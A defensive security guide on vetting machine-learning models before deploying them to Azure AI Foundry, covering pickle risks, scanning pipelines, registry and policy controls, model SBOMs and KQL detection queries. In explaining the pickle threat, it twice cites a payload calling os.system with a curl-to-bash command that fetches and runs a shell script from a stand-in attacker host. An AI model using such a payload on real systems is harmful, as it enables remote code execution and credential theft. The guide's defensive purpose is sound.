Secure AI Supply Chain: Verifying Models Before Deploying to Azure AI Foundry
A data scientist pulled a community model from the Foundry catalog and deployed it to a production hub. The model contained a pickle deserialization payload that executed under the hub's managed identity, giving the attacker access to Key Vault and connected storage. This guide covers model provenance verification, automated scanning pipelines, registry hardening, and the Azure Policy controls that prevent untrusted models from reaching production compute.
The Model That Called Home on First Load
A healthcare analytics team needed a specialized medical NLP model for their Azure AI Foundry RAG pipeline. A senior data scientist found a fine-tuned model on Hugging Face with strong benchmark scores, pulled it through the Foundry model catalog, and deployed it as a managed online endpoint. Within four hours, the endpoint's managed identity had enumerated every secret in the hub's connected Key Vault. The model's config.json contained a serialized pickle object in a custom callback that executed on model load, not during inference. The team's content filters, prompt shields, and rate limits were irrelevant because the attack happened before a single inference request was processed.
This is not a theoretical scenario. Researchers at JFrog, HiddenLayer, and Trail of Bits have documented hundreds of models on public registries containing malicious payloads embedded in pickle files, safetensors metadata, or custom tokenizer code. The Azure AI Foundry security guide covers the threat model at the platform level. This article is the operational playbook for the supply chain layer: how to verify, scan, gate, and monitor every model before it reaches your Foundry compute.
Why AI Model Supply Chains Are Different from Software Supply Chains
Software supply chain security has mature tooling: SBOMs, signed packages, provenance attestations (SLSA), and vulnerability databases (CVE/NVD). AI model supply chains have almost none of that infrastructure in production today.
The fundamental difference is the artifact format. A Python package is source code you can audit. A model weight file is a binary blob that contains learned parameters, but the serialization format can also contain executable code. Python's pickle module is the most notorious example: it deserializes arbitrary Python objects, which means loading a pickle file can execute arbitrary code. But pickle is not the only vector.
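To make the pickle risk concrete, here is a minimal and deliberately harmless sketch of how a callable gets invoked at load time. The `Payload` class is hypothetical and uses `os.getcwd` as a benign stand-in; a real attack would store something like `os.system` in exactly the same way.

```python
import os
import pickle


class Payload:
    """Harmless stand-in for a malicious object embedded in a model file."""

    def __reduce__(self):
        # pickle stores this (callable, args) pair; the unpickler calls it on load.
        # os.getcwd is benign here, but os.system would be stored the same way.
        return (os.getcwd, ())


blob = pickle.dumps(Payload())

# Loading does not rebuild a Payload instance: it calls os.getcwd() and
# hands back whatever that call returns.
result = pickle.loads(blob)
print(type(result).__name__, result)
```

The point of the example is that the loader never asked for a function call. Deserializing the bytes was enough to trigger one.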
Attack Vectors in Model Artifacts
| Vector | File Types | Execution Trigger | Detection Difficulty |
|---|---|---|---|
| Pickle deserialization | .pkl, .pt, .bin | Model load (torch.load()) | Medium: scanners exist |
| Custom tokenizer code | tokenizer.py, __init__.py | Tokenizer initialization | Low: visible in source |
| Safetensors metadata injection | .safetensors | Metadata parsing in custom loaders | High: often trusted as safe |
| ONNX custom operators | .onnx | Runtime operator registration | High: binary inspection needed |
| Notebook execution | .ipynb in model repo | Manual execution by data scientist | Low: but relies on human caution |
| Model card script injection | README.md with HTML/JS | Rendered in web UI | Medium: CSP should block |
The safetensors format was created specifically to avoid pickle's code execution risk. It stores tensors as raw bytes with a JSON header and does not support arbitrary object serialization. However, some model loading pipelines read safetensors metadata and pass values to eval() or exec() in custom preprocessing code. The format is safe; the code around it might not be.
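As an illustration of treating safetensors metadata strictly as data, the sketch below reads only the file header using the standard library. It relies on the published layout (an 8-byte little-endian header length followed by a UTF-8 JSON header with an optional `__metadata__` map). The function names and the size limit are assumptions made for this example, not part of the safetensors library.

```python
import json
import struct


def read_safetensors_header(path, max_header_bytes=100_000_000):
    """Return (tensor_index, metadata) without loading any tensor data."""
    with open(path, "rb") as fh:
        (header_len,) = struct.unpack("<Q", fh.read(8))
        if header_len > max_header_bytes:
            raise ValueError("header length is implausibly large")
        header = json.loads(fh.read(header_len).decode("utf-8"))
    # Metadata is free-form text supplied by whoever produced the file.
    metadata = header.pop("__metadata__", None) or {}
    return header, metadata


def metadata_is_plain_strings(metadata):
    """True when every key and value is a string, as the format expects."""
    return all(isinstance(k, str) and isinstance(v, str) for k, v in metadata.items())
```

Values returned this way can be logged or compared against an allowlist. They should never be handed to eval(), exec(), or a shell.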
Model Provenance: Knowing What You Are Deploying
Provenance answers three questions: who created this model, what data was it trained on, and has it been modified since creation?
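The third question, whether the artifact has changed since it was reviewed, can be checked mechanically. The following is a minimal sketch that compares a model directory against a previously recorded manifest of SHA-256 digests. The manifest shape (relative path mapped to hex digest) and the function names are assumptions for illustration.

```python
import hashlib
from pathlib import Path


def sha256_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so large weight files are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_manifest(model_dir, manifest):
    """Compare files under model_dir with {relative_path: sha256}; return a list of problems."""
    model_dir = Path(model_dir)
    problems, seen = [], set()
    for path in sorted(p for p in model_dir.rglob("*") if p.is_file()):
        rel = path.relative_to(model_dir).as_posix()
        seen.add(rel)
        expected = manifest.get(rel)
        if expected is None:
            problems.append(f"unexpected file: {rel}")
        elif sha256_file(path) != expected:
            problems.append(f"hash mismatch: {rel}")
    for rel in sorted(set(manifest) - seen):
        problems.append(f"missing file: {rel}")
    return problems
```

An empty list means the directory matches the manifest exactly. Any added, removed, or altered file is reported by name.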
Hugging Face Model Cards and Signatures
Hugging Face introduced commit signing for model repositories in 2024. Models signed with GPG keys show a verified badge on the model card. In practice, fewer than 5% of community models are signed. Microsoft-published models in the Foundry catalog are signed, but models from the broader Hugging Face ecosystem that appear in Foundry's catalog are not necessarily verified.
Check signature status before pulling any model:
# Check if a model repo has signed commits
huggingface-cli repo info <org>/<model-name> --revision main

# Verify GPG signature on a specific commit
git -C <local-model-dir> log --show-signature -1
Model Cards as Security Documentation
A model card should tell you:
- Training data sources and any known biases
- Fine-tuning methodology and hyperparameters
- Intended use cases and out-of-scope applications
- Known limitations and failure modes
From a security perspective, the critical field is the training data declaration. If a model was fine-tuned on data that includes your industry's regulated content (HIPAA, PCI, GDPR-scoped data), deploying it may create compliance obligations even if you did not supply the training data yourself.
Building an Internal Model Registry
The single most impactful control for AI supply chain security is never deploying directly from a public registry to production. Every model goes through an internal registry first.
# Create a dedicated Azure Container Registry for model artifacts
az acr create \
  --name prodmodelregistry \
  --resource-group rg-ai-platform \
  --sku Premium \
  --admin-enabled false \
  --public-network-enabled false

# Import a verified model from Hugging Face to internal registry
# After scanning (see next section), push the model artifact
az acr import \
  --name prodmodelregistry \
  --source docker.io/library/model-artifact:v1.2.0 \
  --image verified-models/medical-nlp:v1.2.0-scanned
Tag every imported model with scan results metadata:
# Add scan metadata as OCI annotations
oras push prodmodelregistry.azurecr.io/verified-models/medical-nlp:v1.2.0-scanned \
--annotation "security.scan.tool=modelscan" \
--annotation "security.scan.result=clean" \
--annotation "security.scan.date=2026-06-23" \
--annotation "security.provenance.source=huggingface/medical-nlp-v1" \
--annotation "security.provenance.signer=microsoft" \
./model-weights/
Automated Model Scanning Pipeline
Manual review does not scale. A production AI platform needs automated scanning at two gates: when a model enters the internal registry, and before it deploys to a Foundry endpoint.
Scanning Tools Comparison
| Tool | What It Detects | Format Support | Integration |
|---|---|---|---|
| ModelScan (ProtectAI) | Pickle exploits, unsafe ops | PyTorch, TF, Keras, ONNX | CLI, Python API, CI/CD |
| Fickling (Trail of Bits) | Pickle opcode analysis | Pickle files only | CLI, Python API |
| NB Defense | Notebook credentials, PII | Jupyter notebooks | CLI, pre-commit hook |
| Safetensors Audit | Metadata injection patterns | Safetensors | Python script |
| Semgrep (custom rules) | Unsafe model loading patterns | Python source | CI/CD, IDE |
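To give a feel for what opcode-level pickle analysis involves, here is a rough sketch built on the standard library's `pickletools`. It is not how ModelScan or Fickling are implemented. The opcode set and function name are assumptions chosen for illustration, and the check never executes the pickle.

```python
import pickle
import pickletools

# Opcodes that import names or call objects during unpickling.
SUSPICIOUS_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "REDUCE", "NEWOBJ", "NEWOBJ_EX",
}


def suspicious_opcodes(data):
    """Walk the opcode stream without executing it and report risky opcodes."""
    found = []
    for opcode, arg, pos in pickletools.genops(data):
        if opcode.name in SUSPICIOUS_OPCODES:
            found.append((pos, opcode.name, arg))
    return found


# Plain containers and numbers need none of the flagged opcodes.
print(suspicious_opcodes(pickle.dumps({"layer": [1, 2.0]})))
```

Legitimate PyTorch checkpoints also contain these opcodes because they rebuild tensors through library functions. A practical scanner therefore compares the imported names against an allowlist rather than rejecting every hit.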
GitHub Actions Scanning Pipeline
name: Model Security Scan
on:
  push:
    paths:
      - 'models/**'
  workflow_dispatch:
    inputs:
      model_path:
        description: 'Path to model artifact'
        required: true

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install scanning tools
        run: pip install modelscan fickling
      - name: Run ModelScan
        run: |
          modelscan scan -p ${{ inputs.model_path || 'models/' }} \
            --output-format json \
            --output-file scan-results.json
      - name: Run Fickling on pickle files
        # (commands not included in the source)
      - name: Evaluate scan results
        # A quoted heredoc keeps the shell from interpreting the quotes in the script
        run: |
          python3 - <<'PY'
          import json, sys
          results = json.load(open('scan-results.json'))
          issues = results.get('issues', [])
          critical = [i for i in issues if i['severity'] in ('CRITICAL', 'HIGH')]
          if critical:
              print(f'BLOCKED: {len(critical)} critical/high issues found')
              for i in critical:
                  print(f'  - {i["description"]} in {i["source"]}')
              sys.exit(1)
          print(f'PASSED: {len(issues)} low/info issues, 0 critical')
          PY
      - name: Push to ACR if clean
        # (commands not included in the source)
Pickle Deserialization: The Specific Threat
Python's pickle module uses opcodes to reconstruct objects. The REDUCE opcode calls a callable with arguments, which means a pickle file can encode os.system("curl attacker.com/shell.sh | bash") and it will execute when pickle.load() runs. PyTorch's torch.load() uses pickle by default.
The defense is straightforward: never run an unrestricted torch.load() on untrusted files. Use torch.load(weights_only=True) (available since PyTorch 1.13 and the default from PyTorch 2.6) or convert to safetensors format before deployment.
import torch

# UNSAFE: executes arbitrary code in pickle
model = torch.load("untrusted_model.pt")

# SAFE: only loads tensor data, rejects arbitrary objects
model = torch.load("untrusted_model.pt", weights_only=True)

# SAFEST: convert to safetensors format in quarantine environment
from safetensors.torch import save_file, load_file

# In quarantine VM (isolated, no network, disposable)
state_dict = torch.load("untrusted_model.pt", weights_only=True)
save_file(state_dict, "verified_model.safetensors")

# In production pipeline
model_weights = load_file("verified_model.safetensors")
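The idea behind a restricted load can be sketched with the standard library alone, following the "restricting globals" pattern from the Python pickle documentation. This is conceptually similar to what a weights-only loader does but is not PyTorch's implementation. The allowlist contents and names below are assumptions for illustration.

```python
import collections
import io
import pickle

# Only these (module, name) pairs may be resolved while unpickling.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks to import a global.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is not allowed")


def restricted_loads(data):
    """Unpickle bytes, refusing any global that is not on the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


state = restricted_loads(pickle.dumps(collections.OrderedDict(weight=[0.1, 0.2])))
print(state)
```

A payload that references os.system or any other unlisted callable fails with UnpicklingError before the callable is ever resolved, so nothing runs.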
Azure Policy Gates for Foundry Model Deployments
Azure Policy is your enforcement layer. Scanning catches known threats; policy prevents unscanned models from deploying at all.
Deny Untagged Model Deployments
Create a custom policy that requires model deployments to have a scan result annotation:
{
  "mode": "All",
  "policyRule": {
    "if": {
      "allOf": [
        {
          "field": "type",
          "equals": "Microsoft.MachineLearningServices/workspaces/onlineEndpoints/deployments"
        },
        {
          "not": {
            "field": "tags['security.scan.result']",
            "equals": "clean"
          }
        }
      ]
    },
    "then": {
      "effect": "deny"
    }
  },
  "parameters": {}
}
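Before assigning a rule like this, it can help to reason about which deployments it would reject. The sketch below mirrors the rule's logic in plain Python for pre-flight checks in CI. It is not the Azure Policy engine, the function name is hypothetical, and the case-insensitive comparison is an assumption about how the engine treats string equality.

```python
DEPLOYMENT_TYPE = "Microsoft.MachineLearningServices/workspaces/onlineEndpoints/deployments"


def policy_would_deny(resource):
    """Approximate the rule: deny deployments whose scan tag is not 'clean'."""
    resource_type = str(resource.get("type", ""))
    if resource_type.lower() != DEPLOYMENT_TYPE.lower():
        return False  # the rule only targets online endpoint deployments
    scan_result = (resource.get("tags") or {}).get("security.scan.result")
    # A missing tag fails the equality test, so it is denied as well.
    return str(scan_result or "").lower() != "clean"


print(policy_would_deny({"type": DEPLOYMENT_TYPE, "tags": {}}))
```

The case worth noticing is the untagged deployment: because the condition is wrapped in "not", a deployment with no scan tag at all is denied, which is the behavior the gate depends on.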
Restrict Model Sources to Internal Registry
# Assign policy to deny model deployments from external registries
az policy assignment create \
  --name 'require-internal-model-registry' \
  --display-name 'Require models from internal ACR only' \
  --policy '…'
Separate Hubs for Experimentation vs. Production
The AI Foundry security guide (/blog/azure-ai-foundry-security-threat-model-rbac-governance) recommends hub separation. For supply chain security specifically, the pattern is:
1. Sandbox hub: data scientists can pull any model from the catalog. No production data access. Managed network set to AllowInternetOutbound. Models deployed here are for evaluation only.
2. Staging hub: only models from the internal ACR can be deployed. Automated scanning gate runs before import. Connected to staging data.
3. Production hub: AllowOnlyApprovedOutbound network isolation. Azure Policy denies any model deployment without scan tags. Connected to production data stores with Purview integration.
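The three tiers above can be expressed as a small rules table that a deployment script consults before calling Azure. This is a sketch under stated assumptions: the tier names, rule keys, and function are hypothetical, and the registry hostname is the example one used earlier in this guide.

```python
INTERNAL_REGISTRY = "prodmodelregistry.azurecr.io/"

# One entry per hub tier: which model sources and scan evidence are required.
HUB_RULES = {
    "sandbox": {"internal_only": False, "require_clean_scan": False},
    "staging": {"internal_only": True, "require_clean_scan": False},
    "production": {"internal_only": True, "require_clean_scan": True},
}


def deployment_allowed(hub_tier, model_source, tags=None):
    """Return True when a model source and its tags satisfy the tier's rules."""
    rules = HUB_RULES[hub_tier]
    tags = tags or {}
    if rules["internal_only"] and not model_source.startswith(INTERNAL_REGISTRY):
        return False
    if rules["require_clean_scan"] and tags.get("security.scan.result") != "clean":
        return False
    return True


print(deployment_allowed("production", "huggingface/medical-nlp-v1"))
```

A check like this is a convenience for failing fast in a pipeline. The enforcement still belongs to Azure Policy and network isolation, which a script cannot bypass.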
Model SBOM: Tracking What Is Inside Your Models
A Software Bill of Materials (SBOM) for models is an emerging practice. Unlike software SBOMs (which list packages and versions), a model SBOM documents:
- Base model architecture and version
- Training dataset references (not the data itself)
- Fine-tuning parameters and methodology
- Dependencies required for inference (Python packages, CUDA version)
- Serialization format and any custom operators
Generating a Model SBOM
import hashlib
import json
import os
from datetime import datetime, timezone


def compute_sha256(path, chunk_size=1 << 20):
    """Hash a file in chunks so large weight files are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def generate_model_sbom(model_name, model_path, base_model, training_info):
    sbom = {
        "sbomVersion": "1.0",
        "modelName": model_name,
        "generatedAt": datetime.now(timezone.utc).isoformat(),
        "provenance": {
            "baseModel": base_model,
            "source": training_info.get("source", "internal"),
            "commitHash": training_info.get("commit_hash"),
            "signatureVerified": training_info.get("signed", False),
        },
        "artifacts": [],
        "dependencies": [],
        "securityMetadata": {
            "scanTool": "modelscan",
            "scanDate": None,
            "scanResult": None,
            "format": "safetensors",
            "picklePresent": False,
        },
    }

    # Enumerate model files
    for root, dirs, files in os.walk(model_path):
        for f in files:
            fpath = os.path.join(root, f)
            sbom["artifacts"].append({
                "filename": f,
                "size": os.path.getsize(fpath),
                "sha256": compute_sha256(fpath),
                "format": f.split(".")[-1],
            })
            # Flag formats that are commonly pickle-based
            if f.endswith((".pkl", ".pt", ".bin")):
                sbom["securityMetadata"]["picklePresent"] = True
    return sbom
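An SBOM of this shape can then drive a deployment gate. The sketch below checks that the recorded scan is clean and recent. The 30-day freshness window and the function name are assumptions for illustration, and the field names follow the securityMetadata keys used in the generator.

```python
from datetime import datetime, timedelta, timezone


def sbom_allows_deployment(sbom, max_age_days=30, now=None):
    """Return (allowed, reason) based on the SBOM's recorded scan result and date."""
    now = now or datetime.now(timezone.utc)
    security = sbom.get("securityMetadata", {})
    if security.get("scanResult") != "clean":
        return False, "scan result is not clean"
    scan_date = security.get("scanDate")
    if not scan_date:
        return False, "scan date missing"
    scanned_at = datetime.fromisoformat(scan_date)
    if scanned_at.tzinfo is None:
        # Treat naive timestamps as UTC so the comparison is well defined.
        scanned_at = scanned_at.replace(tzinfo=timezone.utc)
    if now - scanned_at > timedelta(days=max_age_days):
        return False, "scan is stale"
    return True, "ok"
```

Returning a reason alongside the decision keeps pipeline logs readable when a deployment is refused.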
Store the SBOM alongside the model artifact in your internal ACR. When a deployment is created in Foundry, your CI/CD pipeline can pull the SBOM and verify that the scan date is recent and the result is clean before proceeding.
Runtime Monitoring: Detecting Compromised Models Post-Deployment
Even with pre-deployment scanning, runtime monitoring catches behaviors that static analysis misses: models that phone home during inference, models that leak training data through carefully crafted prompts, or models that behave differently after a specific number of requests.
KQL: Anomalous Outbound Connections from Foundry Compute
AzureDiagnostics
| where ResourceType == "WORKSPACES"
| where Category == "ComputeInstanceEvent" or Category == "OnlineEndpointTraffic"
| where properties_s contains "outbound" or properties_s contains "egress"
| extend DestinationIP = extract("destinationAddress=([^,]+)", 1, properties_s)
| where isnotempty(DestinationIP) and not(ipv4_is_private(DestinationIP))
| summarize ConnectionCount = count(), FirstSeen = min(TimeGenerated),
LastSeen = max(TimeGenerated) by DestinationIP, ResourceId
| where ConnectionCount > 10
| order by ConnectionCount desc
Alert on any outbound connection from a managed online endpoint to an IP address outside your known Azure service ranges. In AllowOnlyApprovedOutbound mode, these connections should be blocked, but the alert catches misconfigurations.
KQL: Model Deployment from Non-Approved Source
AzureActivity
| where OperationNameValue == "Microsoft.MachineLearningServices/workspaces/onlineEndpoints/deployments/write"
| where ActivityStatus == "Succeeded"
| extend DeploymentDetails = parse_json(Properties)
| extend ModelSource = tostring(DeploymentDetails.modelSource)
| where ModelSource !contains "prodmodelregistry.azurecr.io"
| project TimeGenerated, Caller, ResourceGroup, ModelSource, ResourceId
| order by TimeGenerated desc
Inference Payload Anomaly Detection
Monitor for unusual inference patterns that indicate model probing or extraction attempts:
// Detect potential model extraction: high volume structured queries from single identity
AMLOnlineEndpointConsoleLog
| where Message contains "request_id"
| extend RequestCaller = extract("caller=([^,]+)", 1, Message)
| summarize RequestCount = count(), AvgLatency = avg(DurationMs) by RequestCaller, bin(TimeGenerated, 1h)
| where RequestCount > 500
| order by RequestCount desc
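The same hourly-threshold logic can be prototyped offline against exported logs before committing to an alert rule. This is a minimal sketch. The event shape (caller, timestamp) and the function name are assumptions, and the default threshold of 500 simply mirrors the query.

```python
from collections import Counter
from datetime import datetime, timedelta


def high_volume_callers(events, threshold=500):
    """Count requests per (caller, hour) and keep buckets above the threshold."""
    counts = Counter()
    for caller, ts in events:
        hour = ts.replace(minute=0, second=0, microsecond=0)
        counts[(caller, hour)] += 1
    return {key: n for key, n in counts.items() if n > threshold}


# Synthetic data: one identity sends 600 requests inside a single hour.
start = datetime(2026, 6, 23, 9, 0, 0)
events = [("svc-extractor", start + timedelta(seconds=i)) for i in range(600)]
events += [("svc-normal", start + timedelta(minutes=i)) for i in range(20)]
flagged = high_volume_callers(events)
print(flagged)
```

Replaying a few weeks of real traffic through a function like this is a cheap way to pick a threshold that does not page on ordinary batch jobs.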
Supply Chain Security for Fine-Tuned Models
Fine-tuning introduces a second supply chain risk: the training data. A model fine-tuned on poisoned data produces biased or manipulated outputs without any malicious code in the model files themselves. This is a data integrity attack, not a code execution attack, and it bypasses every scanning tool discussed above.
Mitigations for Training Data Integrity
- Store all training datasets in versioned blob storage with soft delete enabled
- Require signed commits for any changes to training data repositories
- Run automated data validation checks: schema validation, statistical distribution checks, and outlier detection before fine-tuning jobs
- Log the exact dataset version (commit hash or blob snapshot ID) used for each fine-tuning run in the model SBOM
- Use Microsoft Purview (/blog/microsoft-purview-information-protection-setup-guide) sensitivity labels on training data to enforce access controls
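Two of the validation checks listed above, schema validation and a distribution check, can be sketched in a few lines. The record layout and function names are assumptions for illustration. The distribution check uses total variation distance between label frequencies, which is one reasonable choice among several.

```python
from collections import Counter


def invalid_records(records, required_fields):
    """Return indexes of records missing a required field or holding the wrong type."""
    bad = []
    for i, rec in enumerate(records):
        for field, expected_type in required_fields.items():
            if not isinstance(rec.get(field), expected_type):
                bad.append(i)
                break
    return bad


def label_shift(baseline_labels, candidate_labels):
    """Total variation distance between label distributions (0 identical, 1 disjoint)."""
    if not baseline_labels or not candidate_labels:
        raise ValueError("both label lists must be non-empty")
    base, cand = Counter(baseline_labels), Counter(candidate_labels)
    n_base, n_cand = len(baseline_labels), len(candidate_labels)
    labels = set(base) | set(cand)
    return 0.5 * sum(abs(base[l] / n_base - cand[l] / n_cand) for l in labels)
```

A fine-tuning job could refuse to start when invalid_records is non-empty or when label_shift against the last approved dataset version exceeds a threshold the team has agreed on.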
Federated Credentials for CI/CD Model Pipelines
Your model deployment pipeline should authenticate to Azure using workload identity federation (/blog/flexible-federated-identity-credentials-entra-github-terraform), not stored secrets. A compromised secret in a CI/CD pipeline gives an attacker persistent access to deploy arbitrary models. Federated credentials are short-lived and scoped to the specific pipeline run.
# Create federated credential for GitHub Actions model deployment pipeline
az ad app federated-credential create \
  --id …
Integration with Defender for Cloud
Defender for Cloud provides AI workload protection that complements the supply chain controls in this guide. The coverage as of mid-2026:
| Control | Defender for Cloud | Supply Chain Pipeline |
|---|---|---|
| Pickle exploit detection | No | Yes (ModelScan) |
| Anomalous inference volume | Yes | No (runtime only) |
| Model provenance verification | No | Yes (SBOM + signatures) |
| Prompt injection detection | Yes | No (not supply chain) |
| Unauthorized model deployment | Partial (activity alerts) | Yes (Azure Policy deny) |
| Training data integrity | No | Yes (versioning + Purview) |
| Container vulnerability in model endpoint | Yes | Partial (base image scan) |
Hardening Checklist
- [ ] Internal model registry (ACR) deployed with private endpoint and admin access disabled
- [ ] No direct deployments from public model catalogs to production hubs: Azure Policy enforced
- [ ] ModelScan integrated into CI/CD pipeline scanning all model artifacts before registry push
- [ ] Pickle files blocked or converted to safetensors format before entering internal registry
- [ ] Model SBOM generated and stored alongside every model artifact in ACR
- [ ] Hub separation enforced: sandbox (open catalog) / staging (internal ACR) / production (policy-gated)
- [ ] Federated credentials used for all CI/CD model deployment pipelines: no stored secrets
- [ ] Managed network isolation set to AllowOnlyApprovedOutbound on production hubs
- [ ] KQL alerts deployed for non-approved model sources, anomalous outbound connections, and high-volume inference
- [ ] Training data versioned with blob snapshots and Purview sensitivity labels applied
- [ ] Model provenance (commit signatures) verified before any model enters the internal registry
- [ ] Defender for Cloud AI workload protection enabled alongside the supply chain scanning pipeline
Frequently Asked Questions
Why is pickle deserialization dangerous for AI model files?
Python's pickle module reconstructs arbitrary Python objects from serialized bytes, including objects that execute code on instantiation. The REDUCE opcode in the pickle protocol calls any Python callable with supplied arguments, which means a pickle file can encode os.system("malicious command") and it executes the moment pickle.load() or torch.load() runs. Because PyTorch uses pickle by default for model checkpoints (.pt, .bin files), loading an untrusted model file is functionally equivalent to running an untrusted script. The mitigation is to use torch.load(weights_only=True) or convert all models to safetensors format, which stores only tensor data without code execution capability.
How does an internal model registry prevent supply chain attacks in Azure AI Foundry?
An internal Azure Container Registry acts as a trust boundary between public model sources and your production Foundry compute. Every model from the public Hugging Face catalog or Foundry model registry must first be pulled into a quarantine environment, scanned with tools like ModelScan for malicious payloads, converted to safe serialization formats, and tagged with scan metadata before being pushed to the internal ACR. Azure Policy on your production Foundry hub then denies any model deployment that does not originate from the internal registry or lacks clean scan tags. This two-gate approach (scan before registry entry, policy before deployment) ensures no unverified model reaches production compute.
What is a model SBOM and why does it matter for AI security?
A Model Software Bill of Materials documents the provenance and composition of a machine learning model: the base architecture, training data references, fine-tuning methodology, inference dependencies, serialization format, and security scan results. Unlike software SBOMs that track package dependencies, model SBOMs track the data and training lineage that determines model behavior. This matters for security because a model fine-tuned on poisoned data produces manipulated outputs without any detectable malicious code. The SBOM provides the audit trail needed to trace a model's outputs back to its training inputs when investigating incidents.
Can safetensors files contain malicious code?
The safetensors format itself cannot contain executable code because it stores only raw tensor bytes with a JSON metadata header. However, the loading code around safetensors files can introduce risk. If a custom model loading pipeline reads safetensors metadata and passes values to eval() or exec(), the metadata becomes an injection vector. The defense is twofold: use the standard safetensors library's load_file() function (which does not execute metadata), and audit any custom model loading code for unsafe deserialization patterns using Semgrep or similar static analysis tools.
Microsoft Cloud Solution Architect
Cloud Solution Architect with deep expertise in Microsoft Azure and a strong background in systems and IT infrastructure. Passionate about cloud technologies, security best practices, and helping organizations modernize their infrastructure.